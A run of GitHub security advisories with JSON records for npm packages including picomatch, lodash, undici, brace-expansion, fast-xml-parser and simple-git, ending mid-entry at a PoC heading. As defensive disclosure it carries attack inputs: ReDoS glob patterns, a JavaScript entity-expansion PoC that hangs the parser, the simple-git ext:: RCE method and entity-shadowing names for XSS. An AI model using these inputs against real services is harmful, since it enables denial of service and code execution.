This issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.

Users should upgrade to one of these versions or later, depending on their supported release line.

Workarounds

If upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.

Possible mitigations include: - disable extglob support for untrusted patterns by using noextglob: true - reject or sanitize patterns containing nested extglobs or extglob quantifiers such as +() and *() - enforce strict allowlists for accepted pattern syntax - run matching in an isolated worker or separate process with time and resource limits - apply application-level request throttling and input validation for any endpoint that accepts glob patterns

Resources

Picomatch repository: https://github.com/micromatch/picomatch
lib/parse.js and lib/constants.js are involved in generating the vulnerable regex forms
Comparable ReDoS precedent: CVE-2024-4067 (micromatch)
Comparable generated-regex precedent: CVE-2024-45296 (path-to-regexp)

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "picomatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "picomatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "picomatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33671"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-25T21:12:07Z",
    "nvd_published_at": "2026-03-26T22:16:30Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)",
  "id": "GHSA-c2c7-rcm5-vvqj",
  "modified": "2026-03-27T21:36:13Z",
  "published": "2026-03-25T21:12:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33671"
    },
    {
      "type": "WEB",
      "url": "https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/micromatch/picomatch"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Picomatch has a ReDoS vulnerability via extglob quantifiers"
}

GHSA-F23M-R3PF-42RH

Vulnerability from github – Published: 2026-04-01 23:50 – Updated: 2026-04-01 23:50

Summary

lodash vulnerable to Prototype Pollution via array path bypass in `_.unset` and `_.omit`

Details

Impact

Lodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for CVE-2025-13465 only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.

The issue permits deletion of prototype properties but does not allow overwriting their original behavior.

Patches

This issue is patched in 4.18.0.

Workarounds

None. Upgrade to the patched version.

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.17.23"
      },
      "package": {
        "ecosystem": "npm",
        "name": "lodash"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.17.23"
      },
      "package": {
        "ecosystem": "npm",
        "name": "lodash-es"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.17.23"
      },
      "package": {
        "ecosystem": "npm",
        "name": "lodash-amd"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "lodash.unset"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-2950"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T23:50:27Z",
    "nvd_published_at": "2026-03-31T20:16:26Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nLodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the `_.unset` and `_.omit` functions. The fix for [CVE-2025-13465](https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as `Object.prototype`, `Number.prototype`, and `String.prototype`.\n\nThe issue permits deletion of prototype properties but does not allow overwriting their original behavior.\n\n### Patches\n\nThis issue is patched in 4.18.0.\n\n### Workarounds\n\nNone. Upgrade to the patched version.",
  "id": "GHSA-f23m-r3pf-42rh",
  "modified": "2026-04-01T23:50:27Z",
  "published": "2026-04-01T23:50:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2950"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lodash/lodash"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "lodash vulnerable to Prototype Pollution via array path bypass in `_.unset` and `_.omit`"
}

GHSA-F269-VFMQ-VJVJ

Vulnerability from github – Published: 2026-03-13 20:07 – Updated: 2026-03-13 20:07

Summary

Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client

Details

Impact

A server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici's ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process.

Patches

Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.

Workarounds

There are no workarounds.

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-1528"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1284",
      "CWE-248"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:07:26Z",
    "nvd_published_at": "2026-03-12T21:16:25Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nA server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici\u0027s ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process. \n\n### Patches\n\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\nThere are no workarounds.",
  "id": "GHSA-f269-vfmq-vjvj",
  "modified": "2026-03-13T20:07:26Z",
  "published": "2026-03-13T20:07:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3537648"
    },
    {
      "type": "WEB",
      "url": "https://cna.openjsf.org/security-advisories.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nodejs/undici"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client"
}

GHSA-F886-M6HF-6M8V

Vulnerability from github – Published: 2026-03-26 18:29 – Updated: 2026-03-27 21:38

Summary

brace-expansion: Zero-step sequence causes process hang and memory exhaustion

Details

Impact

A brace pattern with a zero step value (e.g., {1..2..0}) causes the sequence generation loop to run indefinitely, making the process hang for seconds and allocate heaps of memory.

The loop in question:

https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184

test() is one of

https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113

The increment is computed as Math.abs(0) = 0, so the loop variable never advances. On a test machine, the process hangs for about 3.5 seconds and allocates roughly 1.9 GB of memory before throwing a RangeError. Setting max to any value has no effect because the limit is only checked at the output combination step, not during sequence generation.

This affects any application that passes untrusted strings to expand(), or by error sets a step value of 0. That includes tools built on minimatch/glob that resolve patterns from CLI arguments or config files. The input needed is just 10 bytes.

Patches

Upgrade to versions - 5.0.5+

A step increment of 0 is now sanitized to 1, which matches bash behavior.

Workarounds

Sanitize strings passed to expand() to ensure a step value of 0 is not used.

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "brace-expansion"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "5.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "brace-expansion"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "brace-expansion"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "brace-expansion"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.1.13"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33750"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-26T18:29:42Z",
    "nvd_published_at": "2026-03-27T15:16:57Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nA brace pattern with a zero step value (e.g., `{1..2..0}`) causes the sequence generation loop to run indefinitely, making the process hang for seconds and allocate heaps of memory.\n\nThe loop in question:\n\nhttps://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184\n\n`test()` is one of\n\nhttps://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113\n\nThe increment is computed as `Math.abs(0) = 0`, so the loop variable never advances. On a test machine, the process hangs for about 3.5 seconds and allocates roughly 1.9 GB of memory before throwing a `RangeError`. Setting max to any value has no effect because the limit is only checked at the output combination step, not during sequence generation.\n\nThis affects any application that passes untrusted strings to expand(), or by error sets a step value of `0`. That includes tools built on minimatch/glob that resolve patterns from CLI arguments or config files. The input needed is just 10 bytes.\n\n### Patches\n\n\nUpgrade to versions\n- 5.0.5+\n\nA step increment of 0 is now sanitized to 1, which matches bash behavior.\n\n### Workarounds\n\nSanitize strings passed to `expand()` to ensure a step value of `0` is not used.",
  "id": "GHSA-f886-m6hf-6m8v",
  "modified": "2026-03-27T21:38:55Z",
  "published": "2026-03-26T18:29:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33750"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juliangruber/brace-expansion/issues/98"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juliangruber/brace-expansion/pull/95"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juliangruber/brace-expansion/pull/96"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juliangruber/brace-expansion/pull/97"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/juliangruber/brace-expansion"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "brace-expansion: Zero-step sequence causes process hang and memory exhaustion"
}

GHSA-FJ3W-JWP8-X2G3

Vulnerability from github – Published: 2026-02-26 22:33 – Updated: 2026-03-06 22:00

Summary

fast-xml-parser has stack overflow in XMLBuilder with preserveOrder

Details

Impact

Application crashes with stack overflow when user use XML builder with prserveOrder:true for following or similar input

[{
    'foo': [
        { 'bar': [{ '@_V': 'baz' }] }
    ]
}]

Cause: arrToStr was not validating if the input is an array or a string and treating all non-array values as text content. What kind of vulnerability is it? Who is impacted?

Patches

Yes in 5.3.8

Workarounds

Use XML builder with preserveOrder:false or check the input data before passing to builder.

References

Are there any links users can visit to find out more?

Severity ?

2.7 (Low)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.3.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0-beta.0"
            },
            {
              "fixed": "4.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27942"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-120"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-26T22:33:10Z",
    "nvd_published_at": "2026-02-26T02:16:22Z",
    "severity": "LOW"
  },
  "details": "### Impact\nApplication crashes with stack overflow when user use XML builder with `prserveOrder:true` for following or similar input \n\n```\n[{\n    \u0027foo\u0027: [\n        { \u0027bar\u0027: [{ \u0027@_V\u0027: \u0027baz\u0027 }] }\n    ]\n}]\n```\n\nCause: `arrToStr` was not validating if the input is an array or a string and treating all non-array values as text content.\n_What kind of vulnerability is it? Who is impacted?_\n\n### Patches\nYes in 5.3.8\n\n### Workarounds\nUse XML builder with `preserveOrder:false` or check the input data before passing to builder.\n\n### References\n[_Are there any links users can visit to find out more?_](https://github.com/NaturalIntelligence/fast-xml-parser/pull/791)",
  "id": "GHSA-fj3w-jwp8-x2g3",
  "modified": "2026-03-06T22:00:11Z",
  "published": "2026-02-26T22:33:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U",
      "type": "CVSS_V4"
    }
  ],
  "summary": "fast-xml-parser has stack overflow in XMLBuilder with preserveOrder"
}

GHSA-HFFM-XVC3-VPRC

Vulnerability from github – Published: 2026-04-25 06:30 – Updated: 2026-05-05 20:12

Summary

simple-git is vulnerable to Remote Code Execution

Details

Versions of the package simple-git before 3.36.0 are vulnerable to Remote Code Execution (RCE) due to an incomplete fix for CVE-2022-25912 that blocks the -c option but not the equivalent --config form. If untrusted input can reach the options argument passed to simple-git, an attacker may still achieve remote code execution by enabling protocol.ext.allow=always and using an ext:: clone source.

Severity ?

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.2 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "simple-git"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.36.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-6951"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T20:12:16Z",
    "nvd_published_at": "2026-04-25T06:16:16Z",
    "severity": "HIGH"
  },
  "details": "Versions of the package simple-git before 3.36.0 are vulnerable to Remote Code Execution (RCE) due to an incomplete fix for [CVE-2022-25912](https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-3112221) that blocks the -c option but not the equivalent --config form. If untrusted input can reach the options argument passed to simple-git, an attacker may still achieve remote code execution by enabling protocol.ext.allow=always and using an ext:: clone source.",
  "id": "GHSA-hffm-xvc3-vprc",
  "modified": "2026-05-05T20:12:16Z",
  "published": "2026-04-25T06:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6951"
    },
    {
      "type": "WEB",
      "url": "https://github.com/steveukx/git-js/commit/89a2294febed5dfe737c4c735d936bb6018746a8"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/KKC73/02d1d97f3410756095b501fda0ac8ca6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/steveukx/git-js"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-15456078"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "simple-git is vulnerable to Remote Code Execution"
}

GHSA-JMR7-XGP7-CMFJ

Vulnerability from github – Published: 2026-02-17 21:30 – Updated: 2026-02-27 16:50

Summary

fast-xml-parser affected by DoS through entity expansion in DOCTYPE (no expansion limit)

Details

Summary

The XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it’s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application.

Details

There is a check in DocTypeReader.js that tries to prevent entity expansion attacks by rejecting entities that reference other entities (it looks for & inside entity values). This does stop classic “Billion Laughs” payloads.

However, it doesn’t stop a much simpler variant.

If you define one large entity that contains only raw text (no & characters) and then reference it many times, the parser will happily expand it every time. There is no limit on how large the expanded result can become, or how many replacements are allowed.

The problem is in replaceEntitiesValue() inside OrderedObjParser.js. It repeatedly runs val.replace() in a loop, without any checks on total output size or execution cost. As the entity grows or the number of references increases, parsing time explodes.

Relevant code:

DocTypeReader.js (lines 28–33): entity registration only checks for &

OrderedObjParser.js (lines 439–458): entity replacement loop with no limits

PoC

const { XMLParser } = require('fast-xml-parser');

const entity = 'A'.repeat(1000);
const refs = '&big;'.repeat(100);
const xml = `<!DOCTYPE foo [<!ENTITY big "${entity}">]><root>${refs}</root>`;

console.time('parse');
new XMLParser().parse(xml); // ~4–8 seconds for ~1.3 KB of XML
console.timeEnd('parse');

// 5,000 chars × 100 refs takes 200+ seconds
// 50,000 chars × 1,000 refs will hang indefinitely

Impact

This is a straightforward denial-of-service issue.

Any service that parses user-supplied XML using the default configuration is vulnerable. Since Node.js runs on a single thread, the moment the parser starts expanding entities, the event loop is blocked. While this is happening, the server can’t handle any other requests.

In testing, a payload of only a few kilobytes was enough to make a simple HTTP server completely unresponsive for several minutes, with all other requests timing out.

Workaround

Avoid using DOCTYPE parsing by processEntities: false option.

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.1.3"
            },
            {
              "fixed": "4.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.3.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26278"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-17T21:30:10Z",
    "nvd_published_at": "2026-02-19T20:25:43Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it\u2019s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application.\n\n### Details\nThere is a check in `DocTypeReader.js` that tries to prevent entity expansion attacks by rejecting entities that reference other entities (it looks for \u0026 inside entity values). This does stop classic \u201cBillion Laughs\u201d payloads.\n\nHowever, it doesn\u2019t stop a much simpler variant.\n\nIf you define one large entity that contains only raw text (no \u0026 characters) and then reference it many times, the parser will happily expand it every time. There is no limit on how large the expanded result can become, or how many replacements are allowed.\n\nThe problem is in `replaceEntitiesValue()` inside `OrderedObjParser.js`. It repeatedly runs `val.replace()` in a loop, without any checks on total output size or execution cost. As the entity grows or the number of references increases, parsing time explodes.\n\nRelevant code:\n\n`DocTypeReader.js` (lines 28\u201333): entity registration only checks for \u0026\n\n`OrderedObjParser.js` (lines 439\u2013458): entity replacement loop with no limits\n\n### PoC\n\n```js\nconst { XMLParser } = require(\u0027fast-xml-parser\u0027);\n\nconst entity = \u0027A\u0027.repeat(1000);\nconst refs = \u0027\u0026big;\u0027.repeat(100);\nconst xml = `\u003c!DOCTYPE foo [\u003c!ENTITY big \"${entity}\"\u003e]\u003e\u003croot\u003e${refs}\u003c/root\u003e`;\n\nconsole.time(\u0027parse\u0027);\nnew XMLParser().parse(xml); // ~4\u20138 seconds for ~1.3 KB of XML\nconsole.timeEnd(\u0027parse\u0027);\n\n// 5,000 chars \u00d7 100 refs takes 200+ seconds\n// 50,000 chars \u00d7 1,000 refs will hang indefinitely\n```\n\n### Impact\nThis is a straightforward denial-of-service issue.\n\nAny service that parses user-supplied XML using the default configuration is vulnerable. Since Node.js runs on a single thread, the moment the parser starts expanding entities, the event loop is blocked. While this is happening, the server can\u2019t handle any other requests.\n\nIn testing, a payload of only a few kilobytes was enough to make a simple HTTP server completely unresponsive for several minutes, with all other requests timing out.\n\n### Workaround\n\nAvoid using DOCTYPE parsing by `processEntities: false` option.",
  "id": "GHSA-jmr7-xgp7-cmfj",
  "modified": "2026-02-27T16:50:38Z",
  "published": "2026-02-17T21:30:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "fast-xml-parser affected by DoS through entity expansion in DOCTYPE (no expansion limit)"
}

GHSA-M7JM-9GC2-MPF2

Vulnerability from github – Published: 2026-02-20 18:23 – Updated: 2026-02-27 16:51

Summary

fast-xml-parser has an entity encoding bypass via regex injection in DOCTYPE entity names

Details

Entity encoding bypass via regex injection in DOCTYPE entity names

Summary

A dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (<, >, &, ", ') with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.

Details

The fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed . (period), which is valid in XML names per the W3C spec.

In DocTypeReader.js, entity names are passed directly to RegExp():

entities[entityName] = {
    regx: RegExp(`&${entityName};`, "g"),
    val: val
};

An entity named l. produces the regex /&l.;/g where . matches any character, including the t in <. Since DOCTYPE entities are replaced before built-in entities, this shadows < entirely.

The same issue exists in OrderedObjParser.js:81 (addExternalEntities), and in the v6 codebase - EntitiesParser.js has a validateEntityName function with a character blacklist, but . is not included:

// v6 EntitiesParser.js line 96
const specialChar = "!?\\/[]$%{}^&*()<>|+";  // no dot

Shadowing all 5 built-in entities

Entity name	Regex created	Shadows
`l.`	`/&l.;/g`	`<`
`g.`	`/&g.;/g`	`>`
`am.`	`/&am.;/g`	`&`
`quo.`	`/&quo.;/g`	`"`
`apo.`	`/&apo.;/g`	`'`

PoC

